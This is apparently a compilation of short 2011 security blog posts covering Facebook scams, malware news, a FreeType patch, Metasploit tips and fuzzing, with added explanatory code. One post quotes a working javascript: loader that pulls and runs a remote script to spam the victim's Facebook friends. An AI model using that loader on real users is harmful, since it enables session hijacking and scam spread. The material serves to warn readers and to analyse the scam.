Drupalit weekly

Look, it makes them FEEL more secure, OK?

Boss asks this IT pilot fish to make sure he's able to log in from his PC at home. That used to mean a VPN and a SecurID fob, but that's not secure enough, so now there's a new system for doing it.

"Facebook Profile Photos" malware on the run!

Websense Security Labs™ ThreatSeeker™ Network has detected another fake Facebook site campaign, just 4 days after Websense warned of the "Mark Zuckerberg Facebook Page Showing Rogue Comments" hack. A malicious executable file titled "Facebook Profile Photos" appears on the fake Facebook sites. Websense customers have been protected against this attack with ACE, our Advanced Classification Engine.

The attack posts messages on the wall of compromised Facebook accounts, and uses a previously created counterfeit Facebook application to lure users into visiting.

SecGeeks partners with Hacker Halted USA 2011

Hacker Halted USA, October 21-27 in Miami, is the EC-Council's flagship IT security event for both technical experts and C-Level executives. It hosts lots of technical training courses and a two-day conference with exhibits.

The conference track themes include cloud security, SCADA, and timely topics chosen by peer review and input from 450 training companies worldwide.

[Facebook Chat Scam] Osama is dead, Watch the video below

So here is another scam related to Osama's death. This one sends a chat message to your friends on Facebook. It sends a URL in tinyurl form which, on opening, displays the following page:

It tells you to copy and paste the following JavaScript code:

javascript:(a=(b=document).createElement('script')).src='//pro..info/u.php?'+Math.random(),b.body.appendChild(a);void(0)

When you paste the JavaScript code into your address bar, it sends the malicious links to all your friends on Facebook.
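The payload above is a self-XSS loader: the javascript: URL creates a script element whose src points at an attacker host (printed on the page as pro..info) with a Math.random() cache-buster, appends it to the page, and whatever that host serves then runs with the victim's logged-in Facebook session. What follows is an added example, not code from the original post: a small Node.js helper that inspects such a URL without executing it and reports whether it injects a remote script and from which host. inspectBookmarklet and the two sample strings are this example's own names; the scam payload is the one quoted above, the benign bookmarklet is constructed for contrast.

```javascript
// Added example: static triage of "paste this into your address bar" payloads.
// The URL is only parsed with regular expressions, never evaluated.
function inspectBookmarklet(url) {
  const result = {
    isJavascriptUrl: false,
    injectsScript: false,
    scriptSrc: null,
    scriptHost: null,
    cacheBuster: false,
  };
  const trimmed = url.trim();
  // Scheme test is case-insensitive; browsers normalise "JavaScript:" too.
  if (!/^javascript:/i.test(trimmed)) return result;
  result.isJavascriptUrl = true;
  const body = trimmed.slice('javascript:'.length);

  // createElement('script') + appendChild is the classic remote-loader shape.
  const createsScript = /createElement\(\s*['"]script['"]\s*\)/i.test(body);
  const appends = /append(Child)?\s*\(/i.test(body);

  // Pull the literal assigned to .src (the part before any "+ Math.random()").
  const srcMatch = body.match(/\.src\s*=\s*(['"])([^'"]*)\1/i);
  if (srcMatch) {
    result.scriptSrc = srcMatch[2];
    // Protocol-relative ("//host/path") or absolute URL: extract the host,
    // which is what you would hand to a block list.
    const hostMatch = result.scriptSrc.match(/^(?:https?:)?\/\/([^/?#]+)/i);
    if (hostMatch) result.scriptHost = hostMatch[1];
  }
  result.injectsScript = createsScript && appends && result.scriptSrc !== null;

  // '...?' + Math.random() defeats caching so every victim fetches fresh code.
  result.cacheBuster = /Math\.random\(\)/.test(body);
  return result;
}

// Payload copied from the post; the domain appears on the page as "pro..info".
const SCAM_PAYLOAD =
  "javascript:(a=(b=document).createElement('script')).src='//pro..info/u.php?'+Math.random(),b.body.appendChild(a);void(0)";

// Constructed for contrast: a bookmarklet that loads nothing remote.
const BENIGN_PAYLOAD = "javascript:alert(document.title);void(0)";

// Usage: node inspect.js
console.log(inspectBookmarklet(SCAM_PAYLOAD));
console.log(inspectBookmarklet(BENIGN_PAYLOAD));
```

Recent versions of Chrome and Firefox strip the javascript: scheme when a URL is pasted into the address bar, which is the browser-side mitigation for exactly this trick; the helper is for triaging reported payloads and extracting the host to block, not for protecting the victim.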

Apple JailBreakme 3.0 pdf vulnerability fix

It seems that the Apple JailbreakMe PDF, which according to VUPEN was using a 0-day, has been fixed.

If we look at the patch, only a minor check was added:

+ if ( arg_cnt < 0 || subr_no < 0 )
+ goto Unexpected_OtherSubr;
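Review bot: the guard rejects negative arg_cnt and subr_no, which also covers values above 0x7FFFFFFF once they are read into a signed int, but the hunk shows no upper bound on subr_no against the number of subroutines actually present in the font's table; if that bounds check already exists before the index is used, say so in the commit message, otherwise extend this condition, e.g. `if ( arg_cnt < 0 || subr_no < 0 || subr_no >= num_subrs )` where num_subrs stands for whatever the surrounding code calls the table size.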

So, as you might have guessed, the vulnerability triggers if a font file has arg_cnt < 0, or subr_no > 0x7FFFFFFF (which is negative once read as a signed integer); that causes problems :)

cheers,
secgeek

Google translation feature added to secgeeks.com

Dear Users,

I have noticed that secgeeks.com has visitors from many countries, and not all of them know English, which is the primary language of the site. So I have added the Google Translate feature to secgeeks.com; you can see it on the right-hand side. Using this feature you can translate secgeeks.com into your favourite language.

Happy New Year 2011, and I hope you will enjoy this feature.

Thanks,
SecGeek

Converting local file format metasploit modules to web module

I have been working with Metasploit. Sometimes I want fileformat modules to be delivered over the web, but mostly Metasploit creates the exploit files in the C:\framework\msf3\data\exploits folder.
Now what if I want to run a web server and deliver these to the client? I have to do it manually. This happens with most of the fileformat modules.
So if you have faced the same problem, you can follow the tips I am going to mention in this article.
Let's take a simple module, C:\framework\msf3\modules\exploits\windows\fileformat\adobe_jbig2decode.rb

fix for lorcon2, ruby 1.9.2

Faced a minor problem with the Lorcon2 wrapper module when compiling with Ruby 1.9.2. The following will fix the issue for those who are facing it:

Change the STR2CSTR calls in file ruby-lorcon-1.0.0/Lorcon.c at lines 441 and 443:

driver = STR2CSTR(rbdriver);
intf = STR2CSTR(rbintf);

to

driver = StringValuePtr(rbdriver);
intf = StringValuePtr(rbintf);

Hope it helps.

WinDbg Vs OllyDebugger

I have used both debuggers, WinDbg and Olly, but I like WinDbg for various reasons:
1. It has symbol support. You can just add the symbol path in the config and it will give you all the function names during debugging. You can do this in Olly too, but using WinDbg is better.
2. You can use various windows like disassembly, memory and command. This makes sense if you are debugging and need to quickly check memory or disassembly.
3. It has command-line support, which speeds up debugging.
4. Remote debugging: you can debug remotely.

which one do you use and why?

2011 will see Mac, iPhone and iPad security threat

Insecurity outfit McAfee has warned that 2011 will see increased attacks on Apple gear, thanks to the fact that Apple has done well with its iPhone and iPad in the business market.

In the company's 2011 Threats Predictions, McAfee said that Macs were not often targeted by malicious attackers because they are not widely deployed.

However, in 2010 malware for Mac OS started to get a lot cleverer, and McAfee expects the trend to increase in 2011.

Android Malware Spreads via Third-Party App Stores

As the year ended, a new threat for the Android OS was found in ANDROIDOS_GEINIMI.A, which spread from certain third-party app stores in China.

This new threat spread using legitimate applications distributed via third-party stores. These versions, however, were Trojanized to add malicious code. These run completely in the background with no visible differences from the legitimate application. The added code steals a wide variety of information from the user’s phone such as:

* Installed/Running applications

[Facebook Scam Alert] Prince William & Catherine Middleton First Kiss Video

So today is the day Prince William & Catherine got married, and scammers have already started using this for Facebook likejacking.
We got one URL which, on opening, displays the message
"Prince William & Catherine Middleton First Kiss Video" and shows the following picture:

When we look at the code, it contains the following JavaScript:

So there is a Like tag in it.

[Facebook Scam Alert] Free AVTAR DVD

There is a new scam on Facebook which displays the message "free avtar dvd".
It points to the avtar-dvd.info URL. If you click on it, it displays a link to a survey, as below:

On clicking that, you have to fill in a survey:

Beware: no one gives you a blockbuster movie DVD for free :)

[Facebook Scam Alert] Photographer commited SUICIDE 3 days after shooting THIS video!

I have come across another scam with the title "Photographer commited SUICIDE 3 days after shooting THIS video!".

It basically displays the following on the infected user's profile:

After the user clicks on Jaa, it uses a new trick: it opens the Facebook share page and resizes it, and when you click on Jaa it shares the link on the user's profile.

After that it opens a survey.

Wish you all a very happy new year 2011

Dear All,
Secgeeks.com wishes you all a very happy new year 2011.

"May what you see in the mirror delight you, and what others see in you delight them. May someone love you enough to forgive your faults, be blind to your blemishes, and tell the world about your virtues.

May the telemarketers wait to make their sales calls until you finish dinner, may the commercials on TV not be louder than the program you have been watching, and may your check book and your budget balance - and include generous amounts for charity. "

Wishing you again a very happy new year.

Metasploit vs Sulley

I have been working with Metasploit and Sulley lately for developing a couple of fuzzers. I think Sulley is a much better choice for writing fuzzers. The reason is that it does intelligent fuzzing rather than dumb fuzzing.
For example, if you have a protocol where a length is denoted as 2 bytes BE, it makes sense to fuzz at extreme values, i.e. 0xFFFF or 0x0000; it does not make sense to fuzz each and every value like 0x0002, 0x0003.
Sulley does a good job here, while in Metasploit you need to generate random data which can be of any range.
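The point above, shown as an added example that is neither Sulley's nor Metasploit's own code: a boundary-value generator for an unsigned big-endian length field, the uniformly random alternative for contrast, and a constructed toy parser that trusts the length prefix so you can see which of the generated values a real bounds check would have to reject. The wire format (a 2-byte BE length followed by the body) and all function names are this example's own assumptions.

```python
"""Added example: "fuzz the edges, not every value" for a BE length field.
Constructed toy protocol: <length, `width` bytes big-endian> || body."""
import random
from typing import Iterator, List, Tuple


def length_field_candidates(correct_len: int, width: int = 2) -> List[int]:
    """Boundary values for an unsigned `width`-byte length field.

    Rather than walking 0x0000, 0x0001, 0x0002, ... this emits only values that
    tend to hit parser edges: zero, the maximum, the signed/unsigned boundary
    (0x7FFF / 0x8000 for 2 bytes, where a signed read flips negative) and
    off-by-one around the length the message really has.
    """
    bits = width * 8
    maxval = (1 << bits) - 1
    signed_max = (1 << (bits - 1)) - 1
    wanted = {
        0, 1,
        signed_max, signed_max + 1,
        maxval - 1, maxval,
        correct_len - 1, correct_len, correct_len + 1,
    }
    # drop anything that does not fit the field (e.g. -1 when correct_len == 0)
    return sorted(v for v in wanted if 0 <= v <= maxval)


def dumb_candidates(count: int, width: int = 2, seed: int = 0) -> List[int]:
    """The contrast: `count` uniformly random lengths. Seeded so the example is
    reproducible; the interesting boundary values are hit only by luck."""
    rng = random.Random(seed)
    maxval = (1 << (width * 8)) - 1
    return [rng.randint(0, maxval) for _ in range(count)]


def mutate_message(body: bytes, width: int = 2) -> Iterator[bytes]:
    """Yield one toy-protocol message per candidate length; body is unchanged."""
    for claimed in length_field_candidates(len(body), width):
        yield claimed.to_bytes(width, "big") + body


def naive_parse(msg: bytes, width: int = 2) -> Tuple[int, bytes, bool]:
    """Constructed toy parser that trusts the length prefix.

    Returns (claimed_length, body_it_got, mismatch). A claimed length larger
    than the data present is the classic over-read: Python slicing merely
    truncates, a C memcpy with the claimed size would not, and that gap is
    exactly what the fuzzer is looking for.
    """
    claimed = int.from_bytes(msg[:width], "big")
    body = msg[width:width + claimed]
    return claimed, body, len(body) != claimed


def find_length_mismatches(body: bytes, width: int = 2) -> List[int]:
    """Claimed lengths the prefix cannot be satisfied for, i.e. the inputs a
    real parser must reject with a bounds check before it copies anything."""
    out = []
    for msg in mutate_message(body, width):
        claimed, _, bad = naive_parse(msg, width)
        if bad:
            out.append(claimed)
    return out


if __name__ == "__main__":
    sample = b"ABCD"  # constructed 4-byte body
    print("smart candidates:", [hex(v) for v in length_field_candidates(len(sample))])
    print("dumb candidates: ", [hex(v) for v in dumb_candidates(9)])
    print("over-reads found:", find_length_mismatches(sample))
```

For the 4-byte body the smart list is nine values, five of which claim more data than exists; nine random draws from 0..0xFFFF almost never include 0x7FFF, 0x8000 or 0xFFFF, which is the post's argument in numbers.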

Internet Explorer Zero-Day Accidentally Leaked To Chinese Hackers

Details concerning a potentially serious security vulnerability in fully patched versions of Microsoft's Internet Explorer have been leaked to people in China, a researcher warned over the weekend.

Alert - Fake youtube premium plugin is getting used in latest facebook scam.

I was checking my Facebook and suddenly the following caught my attention:

On clicking the download button, it downloaded an extension for my Firefox, so I decided to analyze it. I unpacked it and see the following:

On opening the file youtube.js, I can see the following code:

It downloads a script from another source, so let's see what it contains:

What's the point of Google Chrome OS?

After all the noise over Google's Chrome OS announcement yesterday, I find people scratching their heads. They can't see the point of what Google's doing. They especially can't see the point for enterprise IT.

Chinese auction site sells thousands of stolen iTunes accounts

50,000 stolen iTunes accounts linked to stolen credit cards are being sold on a Chinese auction site, according to a report from the BBC.

Listings on TaoBao, the Chinese equivalent of eBay, are promising access to iTunes downloads for between 1 yuan ($0.15) and 200 yuan ($30).

However, customers are advised that they are likely to have only about 12 hours to download apps, movies, games and music from the online store before their accounts are suspended.